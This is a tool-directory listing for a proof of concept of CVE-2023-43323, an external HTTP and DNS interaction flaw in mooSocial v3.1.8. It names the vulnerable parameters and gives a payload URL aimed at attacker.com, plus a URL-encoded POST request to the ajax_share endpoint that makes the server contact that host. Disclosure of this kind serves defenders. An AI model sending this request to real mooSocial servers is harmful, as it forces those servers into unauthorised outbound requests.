Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-43323 — mooSocial v3.1.8 is vulnerable to external service interaction on post function. | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2023-43323
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringDNS Analysis
GitHubahrixia/cve-2023-43323

CVE-2023-43323

mooSocial v3.1.8 is vulnerable to external service interaction on post function.

View Repository
1222 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

mooSocial: External HTTP and DNS Service Interaction (CVE-2023-43323)

mooSocial v3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server.

Vulerable Parameter: messageText, data[wall_photo], data[userShareVideo] and data[userShareLink]

Exploit - Proof of Concept (POC)

External HTTP and DNS Service Interaction

root@kitploit:~
Payload : http://attacker.com/?null=

POST Request on /moosocial/activities/ajax_share (POST REQUEST DATA ONLY):

root@kitploit:~
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]

image

Download Tool